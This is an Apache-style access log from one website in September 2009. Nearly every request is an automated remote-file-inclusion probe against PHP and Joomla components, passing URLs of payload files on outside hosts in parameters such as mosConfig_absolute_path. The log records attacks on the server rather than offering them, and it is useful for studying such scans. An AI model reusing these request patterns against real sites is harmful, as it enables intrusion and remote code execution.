210.198.6.113 - - [27/Sep/2009:23:33:15 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.198.6.113 - - [27/Sep/2009:23:33:15 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.198.6.113 - - [27/Sep/2009:23:33:53 -0700] "GET /logs/index.php?body=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.198.6.113 - - [27/Sep/2009:23:33:53 -0700] "GET /logs/access_090914.log/index.php?body=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.198.6.113 - - [27/Sep/2009:23:33:53 -0700] "GET /index.php?body=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.198.6.113 - - [27/Sep/2009:23:34:13 -0700] "GET /logs/access_090413.log/index.php?body=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:34:47 -0700] "GET /pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:34:47 -0700] "GET /logs//pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:34:47 -0700] "GET /logs/access_090622.log//pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:35:09 -0700] "GET /logs//pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:35:09 -0700] "GET /pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:35:09 -0700] "GET /logs/access_090622.log//pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:35:10 -0700] "GET /logs/access_090601.log//pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:35:14 -0700] "GET /logs/access_090601.log//pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:38:16 -0700] "GET /logs/access_090525.log//export.php?mosConfig_absolute_http://www.geejohn.com/fuck.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:38:16 -0700] "GET /export.php?mosConfig_absolute_http://www.geejohn.com/fuck.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:38:16 -0700] "GET /logs//export.php?mosConfig_absolute_http://www.geejohn.com/fuck.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:38:17 -0700] "GET /logs/access_090622.log//export.php?mosConfig_absolute_http://www.geejohn.com/fuck.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:23:39:41 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
77.37.18.233 - - [27/Sep/2009:23:40:03 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.37.18.233 - - [27/Sep/2009:23:40:03 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.37.18.233 - - [27/Sep/2009:23:40:03 -0700] "GET /logs/access_090803.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:23:40:03 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
210.198.6.113 - - [27/Sep/2009:23:40:16 -0700] "GET /logs/access_090914.log%20%20/index.php?body=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.198.6.113 - - [27/Sep/2009:23:40:38 -0700] "GET /logs/access_090413.log%20%20/index.php?body=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.115.153 - - [27/Sep/2009:23:40:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
210.198.6.113 - - [27/Sep/2009:23:41:53 -0700] "GET /logs/access.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
204.15.230.189 - - [27/Sep/2009:23:42:09 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:23:42:10 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:23:42:10 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 200 4804 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:23:42:12 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:23:42:12 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:23:42:12 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 200 4804 "-" "libwww-perl/5.79" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:23:42:27 -0700] "GET /logs/access_090420.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:23:42:27 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:23:42:27 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:43:34 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:43:34 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:43:34 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:23:43:50 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:23:43:50 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
77.37.18.233 - - [27/Sep/2009:23:43:50 -0700] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:23:43:55 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:44:22 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:44:22 -0700] "GET /logs/access_090608.log////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:44:22 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:44:29 -0700] "GET /logs/access_090525.log//export.php?mosConfig_absolute_http://www.geejohn.com/fuck.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:44:29 -0700] "GET /export.php?mosConfig_absolute_http://www.geejohn.com/fuck.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:44:29 -0700] "GET /logs//export.php?mosConfig_absolute_http://www.geejohn.com/fuck.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:44:29 -0700] "GET /logs/access_090622.log//export.php?mosConfig_absolute_http://www.geejohn.com/fuck.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:44:59 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:44:59 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:23:44:59 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:45:12 -0700] "GET /logs/access_090615.log////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:23:45:16 -0700] "GET /logs/access_090706.log%20%20//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:23:45:16 -0700] "GET /errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:23:45:16 -0700] "GET /logs//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:46:43 -0700] "GET /logs/access_090608.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:23:46:48 -0700] "GET /logs/access_090706.log//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:47:33 -0700] "GET /logs/access_090615.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:23:47:39 -0700] "GET /logs/access_090831.log//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:49:19 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:49:19 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:49:19 -0700] "GET /logs/access_090608.log////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:49:39 -0700] "GET /logs/access_090615.log////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [27/Sep/2009:23:50:17 -0700] "GET /logs/access_090420.log%20%20//Neos_Chronos/header.php?base_folder=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [27/Sep/2009:23:50:17 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [27/Sep/2009:23:50:17 -0700] "GET /Neos_Chronos/header.php?base_folder=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:23:52:41 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:23:52:41 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:23:52:41 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:23:52:53 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [27/Sep/2009:23:52:53 -0700] "GET /logs/access.log////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [27/Sep/2009:23:52:53 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.202.2.64 - - [27/Sep/2009:23:53:23 -0700] "GET /logs/access_090420.log%20%20//Neos_Chronos/header.php?base_folder=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [27/Sep/2009:23:53:23 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [27/Sep/2009:23:53:23 -0700] "GET /Neos_Chronos/header.php?base_folder=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:23:53:40 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [27/Sep/2009:23:53:40 -0700] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [27/Sep/2009:23:53:45 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.6.22.88 - - [27/Sep/2009:23:54:38 -0700] "GET /?S=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:23:55:29 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [27/Sep/2009:23:55:29 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [27/Sep/2009:23:55:29 -0700] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [27/Sep/2009:23:58:55 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [27/Sep/2009:23:58:55 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [27/Sep/2009:23:58:55 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [28/Sep/2009:00:00:34 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:00:34 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:00:34 -0700] "GET /logs/access_090420.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:02:26 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.198.6.113 - - [28/Sep/2009:00:02:30 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.198.6.113 - - [28/Sep/2009:00:02:30 -0700] "GET /logs/access_090420.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.198.6.113 - - [28/Sep/2009:00:02:30 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:03:03 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [28/Sep/2009:00:03:03 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [28/Sep/2009:00:03:03 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.30.194.163 - - [28/Sep/2009:00:05:00 -0700] "GET /db.php?commonpath=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [28/Sep/2009:00:05:05 -0700] "GET /logs/db.php?commonpath=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [28/Sep/2009:00:05:05 -0700] "GET /logs/access_090608.log/db.php?commonpath=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [28/Sep/2009:00:05:41 -0700] "GET /logs/access_090615.log/db.php?commonpath=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:00:05:52 -0700] "GET /newspublish/include.php?path[docroot]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:00:05:52 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:00:05:52 -0700] "GET /logs/access_090525.log%20%20//newspublish/include.php?path[docroot]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:05:56 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
194.93.130.37 - - [28/Sep/2009:00:06:02 -0700] "GET /logs/access_090629.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://unixstats.org/tools/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
194.93.130.37 - - [28/Sep/2009:00:06:02 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://unixstats.org/tools/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
194.93.130.37 - - [28/Sep/2009:00:06:02 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://unixstats.org/tools/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:00:06:06 -0700] "GET /newspublish/include.php?path[docroot]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:00:06:06 -0700] "GET /logs/access_090525.log%20%20//newspublish/include.php?path[docroot]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:00:06:06 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:00:06:12 -0700] "GET /logs/access_090720.log%20%20//newspublish/include.php?path[docroot]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:00:06:26 -0700] "GET /logs/access_090720.log%20%20//newspublish/include.php?path[docroot]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:06:29 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
